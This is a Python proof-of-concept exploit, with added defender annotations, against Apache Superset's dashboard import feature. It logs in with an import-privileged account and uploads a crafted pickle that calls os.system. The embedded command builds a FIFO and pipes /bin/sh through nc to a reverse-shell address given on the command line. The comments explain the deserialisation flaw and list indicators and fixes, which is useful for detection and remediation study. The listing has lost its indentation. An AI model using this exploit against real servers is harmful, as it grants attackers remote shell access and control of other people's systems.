'''_____________________________________________________________________
|[] SHELL |ROOT]|!"|
|"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""|"|
|CODED BY > R3DXPLOIT(JIMMY) | |
|EMAIL > [email protected] | |
|Original PoC by David May ([email protected]) | |
|_____________________________________________________________________|/|
'''
import sys
import os
from lxml import html
import requests
import argparse
# Request headers that imitate a desktop Firefox 58 browser on Linux.
# main() assigns a name headers_dict of its own with the same contents,
# so this module-level copy is not what the POST requests below read.
headers_dict = {}
headers_dict['User-Agent'] = 'Mozilla/5.0 (X11; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0'
headers_dict['DNT'] = '1'
headers_dict['Connection'] = 'close'
headers_dict['Upgrade-Insecure-Requests'] = '1'
# main: command-line driver of this proof of concept. As written below it
# (1) parses its arguments, (2) writes a pickle file into the working
# directory, (3) logs in to a Superset instance over plain HTTP, and
# (4) uploads the pickle to the dashboard-import endpoint.
# NOTE(review): this listing has lost its indentation, so the exact extent of
# each if/try body cannot be confirmed from the page.
# Defender summary: the technique depends on the server deserialising an
# uploaded file with pickle, and on an authenticated account that holds the
# "can Import Dashboards" permission (per the -U/-P help text). The durable
# fix is server-side: an import path that never unpickles uploaded data,
# a tightly scoped import permission, and restricted egress from the app host.
def main() :
parser = argparse.ArgumentParser()
# -t/-tp are concatenated into login_URL and upload_URL below, i.e. they name
# the Superset host the requests go to; -i/-p are embedded in the pickle's
# command string and in the local file name. The help texts do not make this
# distinction clear.
parser.add_argument('-t', '--tcp', help='tcp ip for shell', dest='tcp' , required = True )
parser.add_argument('-tp', '--tport', help='tcp port for shell', dest='tport', required = True)
parser.add_argument('-i', '--ip', help='ip', dest='ip', required = True)
parser.add_argument('-p', '--port', help='port', dest='port', required = True)
parser.add_argument('-U', '--user', help='User must belong to user with can Import Dashboards on Superset privilege', dest='user', required = True)
parser.add_argument('-P', '--passw', help='pass must belong to user with can Import Dashboards on Superset privilege', dest='passw', required = True)
args = parser.parse_args()
# Script arguments
# Self-assignment: has no effect.
args.port = args.port
# Verify these URLs match your environment
login_URL = 'http://' + args.tcp + ':' + args.tport + '/login/'
upload_URL = 'http://' + args.tcp + ':' + args.tport + '/superset/import_dashboards'
# Delete a leftover "<ip>_<port>.pickle" from an earlier run, if present.
if os.path.isfile(str(args.ip)+'_'+str(args.port)+'.pickle'):
os.remove(str(args.ip)+'_'+str(args.port)+'.pickle')
# Assigning here makes headers_dict a local name, shadowing the module-level
# dict with identical contents.
headers_dict = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0',
'DNT': '1',
'Connection': 'close',
'Upgrade-Insecure-Requests': '1',
}
# The file content is hand-written protocol-0 pickle text: the GLOBAL opcode
# names os.system and the REDUCE opcode calls it with the quoted string, so any
# pickle.loads() of this file runs that shell command with the privileges of
# the unpickling process. This is the reason pickle must never be applied to
# uploaded or otherwise untrusted data.
# Host-side indicators visible in the command string: a FIFO at /tmp/backpipe,
# and the application process spawning /bin/sh, mknod and nc with an outbound
# connection to the address passed as -i/-p.
evilPickle = open(str(args.ip)+'_'+str(args.port)+'.pickle','w+')
evilPickle.write('cos\nsystem\n(S\'rm /tmp/backpipe;mknod /tmp/backpipe p;/bin/sh 0</tmp/backpipe | nc ' + args.ip + ' ' + args.port + ' 1>/tmp/backpipe\'\ntR.')
evilPickle.close()
try :
# One requests session is used throughout so the login cookie carries over to
# the upload request.
session = requests.session()
# This GET is sent without headers_dict, so it goes out with the requests
# library's default headers while the later POSTs carry the Firefox-style set;
# that mismatch inside one session is a usable network detection signal.
login_page = session.get(login_URL)
# A non-200 status is only reported; no return or exit is visible here.
if login_page.status_code != 200:
print('Login page not reached')
# Scrape the CSRF token from the login form; xpath() returns a list of matches.
login_tree = html.fromstring(login_page.content)
token = login_tree.xpath('//input[@id="csrf_token"]/@value')
login_data = {
'token' : token,
'username' : args.user,
'password' : args.passw,
}
headers_dict['Referer'] = login_URL
# The response is stored but never inspected, so a failed login is not detected
# by the script.
login = session.post(login_URL, headers=headers_dict, data=login_data)
# Same pattern for the import page: fetch, report a non-200 status, scrape the
# token.
upload_page = session.get(upload_URL)
if upload_page.status_code != 200:
print('Upload page not reached')
upload_tree = html.fromstring(upload_page.content)
token = upload_tree.xpath('//input[@id="csrf_token"]/@value')
headers_dict['Referer'] = upload_URL
# Multipart POST of the pickle file, declared as application/octet-stream, to
# /superset/import_dashboards. Server-side, an authenticated upload to this
# path followed by shell child processes of the web worker is the sequence to
# alert on.
upload = session.post(upload_URL, headers=headers_dict, data={'token':token}, files={'file':(str(args.ip)+'_'+str(args.port)+'.pickle',open(str(args.ip)+'_'+str(args.port)+'.pickle','rb'),'application/octet-stream')})
session.close()
# sys.exit() raises SystemExit, which the "except Exception" handler below does
# not catch.
sys.exit()
except requests.exceptions.ConnectionError :
print('Connection Refused, Check The IP and PORT!!!')
# Any other exception is printed and the function then ends.
except Exception as e:
print('Error :\n\n' , e)
# Run main() only when the file is executed as a script, not when imported.
if __name__ == "__main__" :
main()